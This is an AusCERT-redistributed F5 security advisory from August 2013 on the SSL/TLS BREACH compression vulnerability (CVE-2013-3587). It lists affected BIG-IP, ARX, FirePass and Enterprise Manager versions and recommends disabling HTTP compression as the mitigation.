23 August 2013
Protect yourself against future threats.
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 =========================================================================== AUSCERT External Security Bulletin Redistribution ESB-2013.1149 sol14634: SSL / TLS BREACH vulnerability - CVE-2013-3587 23 August 2013 =========================================================================== AusCERT Security Bulletin Summary --------------------------------- Product: F5 Products Publisher: F5 Operating System: Network Appliance Impact/Access: Access Privileged Data -- Remote/Unauthenticated Resolution: Patch/Upgrade CVE Names: CVE-2013-3587 Original Bulletin: http://support.f5.com/kb/en-us/solutions/public/14000/600/sol14634.html - --------------------------BEGIN INCLUDED TEXT-------------------- sol14634: SSL / TLS BREACH vulnerability - CVE-2013-3587 Security Advisory Original Publication Date: 08/22/2013 Description The BREACH vulnerability allows attackers to discover secrets wrapped in HTTP compression inside of SSL. By injecting plaintext into an HTTPS request, an attacker can learn information about the corresponding HTTPS response by measuring its size. This action relies on the attacker's ability to observe the size of the ciphertext received by the browser while triggering a number of strategically crafted requests to a target site. Impact By observing the length of compressed HTTPS responses, an attacker may be able to obtain plaintext secrets from the ciphertext of an HTTPS stream. Status F5 Product Development has assigned ID 427375 (BIG-IP and Enterprise Manager) ID 428152 (FirePass), and ID 428241 (ARX) to this vulnerability. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table: Product Versions known to Versions known to Vulnerable component be vulnerable be not vulnerable or feature BIG-IP LTM 9.0.0 - 9.6.1 10.0.0 - 10.2.4 11.0.0 - 11.4.0 None SSL virtual servers BIG-IP AAM 11.4.0 None SSL virtual servers BIG-IP AFM 11.3.0 - 11.4.0 None SSL virtual servers BIG-IP Analytics 11.0.0 - 11.4.0 None SSL virtual servers BIG-IP APM 10.1.0 - 10.2.4 11.0.0 - 11.4.0 None SSL virtual servers BIG-IP ASM 9.2.0 - 9.4.8 10.0.0 - 10.2.4 11.0.0 - 11.4.0 None SSL virtual servers BIG-IP Edge Gateway 10.1.0 - 10.2.4 11.0.0 - 11.4.0 None SSL virtual servers BIG-IP GTM None 9.2.2 - 9.4.8 10.0.0 - 10.2.4 11.0.0 - 11.4.0 None BIG-IP Link Controller 9.2.2 - 9.4.8 10.0.0 - 10.2.4 11.0.0 - 11.4.0 None SSL virtual servers BIG-IP PEM 11.3.0 - 11.4.0 None SSL virtual servers BIG-IP PSM 9.4.5 - 9.4.8 10.0.0 - 10.2.4 11.0.0 - 11.4.0 None SSL virtual servers BIG-IP WebAccelerator 9.4.0 - 9.4.8 10.0.0 - 10.2.4 11.0.0 - 11.3.0 None SSL virtual servers BIG-IP WOM 10.0.0 - 10.2.4 11.0.0 - 11.3.0 None SSL virtual servers ARX 5.0.0 - 5.3.1 6.0.0 - 6.4.0 None ARX Manager GUI Enterprise Manager None 1.6.0 - 1.8.0 2.0.0 - 2.3.0 3.0.0 - 3.1.1 None FirePass 6.0.0 - 6.1.0 7.0.0 None Web services BIG-IQ Cloud None 4.0.0 - 4.1.0 None BIG-IQ Security None 4.0.0 - 4.1.0 None Recommended action To mitigate this vulnerability, you can disable HTTP compression, or only enable HTTP compression for static content. For information about configuring HTTP compression, refer to the product guides for your specific product and ersion. Impact of Action: Slower page load times occur for dynamic content. Supplemental Information SOL9970: Subscribing to email notifications regarding F5 products SOL9957: Creating a custom RSS feed to view new and updated documents. SOL4602: Overview of the F5 security vulnerability response policy SOL4918: Overview of the F5 critical issue hotfix policy SOL167: Downloading software and firmware from F5 SOL13123: Managing BIG-IP product hotfixes (11.x) SOL10025: Managing BIG-IP product hotfixes (10.x) SOL6845: Managing BIG-IP product hotfixes (9.x) SOL9502: BIG-IP hotfix matrix SOL10322: FirePass hotfix matrix SOL12766: ARX hotfix matrix SOL3430: Installing FirePass hotfixes - --------------------------END INCLUDED TEXT-------------------- You have received this e-mail bulletin as a result of your organisation's registration with AusCERT. The mailing list you are subscribed to is maintained within your organisation, so if you do not wish to continue receiving these bulletins you should contact your local IT manager. If you do not know who that is, please send an email to firstname.lastname@example.org and we will forward your request to the appropriate person. NOTE: Third Party Rights This security bulletin is provided as a service to AusCERT's members. As AusCERT did not write the document quoted above, AusCERT has had no control over its content. The decision to follow or act on information or advice contained in this security bulletin is the responsibility of each user or organisation, and should be considered in accordance with your organisation's site policies and procedures. AusCERT takes no responsibility for consequences which may arise from following or acting on information or advice contained in this security bulletin. NOTE: This is only the original release of the security bulletin. It may not be updated when updates to the original are made. If downloading at a later date, it is recommended that the bulletin is retrieved directly from the author's website to ensure that the information is still current. Contact information for the authors of the original document is included in the Security Bulletin above. If you have any questions or need further information, please contact them directly. Previous advisories and external security bulletins can be retrieved from: http://www.auscert.org.au/render.html?cid=1980 =========================================================================== Australian Computer Emergency Response Team The University of Queensland Brisbane Qld 4072 Internet Email: email@example.com Facsimile: (07) 3365 7031 Telephone: (07) 3365 4417 (International: +61 7 3365 4417) AusCERT personnel answer during Queensland business hours which are GMT+10:00 (AEST). On call after hours for member emergencies only. =========================================================================== -----BEGIN PGP SIGNATURE----- Comment: http://www.auscert.org.au/render.html?it=1967 iQIVAwUBUhbeRBLndAQH1ShLAQLGCQ//cxPOz1UNGWU+0rVPAmfgSRTcXKDYj1Ud H0lskYuTPnrYGz+hLRjB462rzA0P/0/0g8+MvKS1raxtFzMWbKjqClMftWQ+NiKg s0dyHNu6Ax+x6+FNsIGv1zSCvmxnsdISAwrhOGLyNDuAyIFh0T6XEcxhkEsg/zC2 M3VSMeB/Vqc7OhirQ7ENEcodJRrAsA2zg/SDZa4dWjD+aZsSK3oSJGDLaiNoyeH6 CKSW/gA1lfTRvFX9/pDJRSbgF+MMRenp3JqcQocYjmI0ex5ArEi2W5AOIsYPP21C fnDtUoTtXiDXaxy5RMDdcdGe9u9/ICu8KBQ+qJRo0y8L49l6IamHoNSdsu74ZH5z da8zKkUuZqo/mxk4ML0BUxsQJ//eMHJETujjOcfgSVBp4k+F+EHp4QNqhWrKNdOI YyP0+RY/a9BEohHHJKK7lz/sQEil1D6iTejGhQoG5CobhMCx523OWnz750JbAExo 8IdPhLjci4e8N7/+pJSN6MWlMjkYgbAjAloGOIsq6JyATqXNSmHTVEQ5LnLD5Pik oVmkFMLNdtPA1KuJHHKGijaGWWNERid2u4wcECVfdAL6OjRnE/MjhAz96lvoH1cR W2RHb166wfkwusi8Q/pEQGfyp22jcEaTQjrKG4FpSGLVWj6c+0TLuvVHd9jVJHQ2 U8TzO0Ec5vo= =pe1x -----END PGP SIGNATURE-----